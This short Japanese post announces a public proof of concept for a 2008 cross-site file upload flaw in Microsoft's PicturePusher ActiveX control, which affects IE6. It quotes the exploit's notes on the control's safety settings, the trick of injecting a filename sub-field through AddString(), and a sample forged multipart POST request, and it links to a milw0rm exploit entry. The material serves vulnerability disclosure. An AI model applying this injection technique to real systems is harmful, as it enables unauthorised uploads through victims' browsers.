Microsoft PicturePusher ActiveX Cross Site File Upload Attack PoC(情報元のブックマーク数)
Microsoft PicturePusher ActiveX のクロスサイトスクリプティングな脆弱性のPoCがでています。
%lt;!--
Microsoft PicturePusher ActiveX (PipPPush.DLL 7.00.0709) remote Cross Site File
Upload attack POC (IE6)
by Nine:Situations:Group::pyrokinesisbug discovered by rgod during early March 2008
tested software: Microsoft Digital Image 2006 Starter Edition
works fine against IE6, with some warnings with IE7dll settings:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,dataThis control allows to build highly customized POST requests against private
upload facilities, using the browser as a proxy to bounce them and by injecting
a filename sub-field through ex. the AddString() methodThe magic packet :
POST /?aaaa=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0) [MSN Communities Active-X Upload Control]
Host: 127.0.0.1
Content-Length: 181
Cache-Control: no-cache
- -
Content-Disposition: form-data; name="aaaa"; filename="suntzu.test"
Content-Type: text/plain; AAAA: ""xxxxxxxx
http://www.milw0rm.com/exploits/6699
- -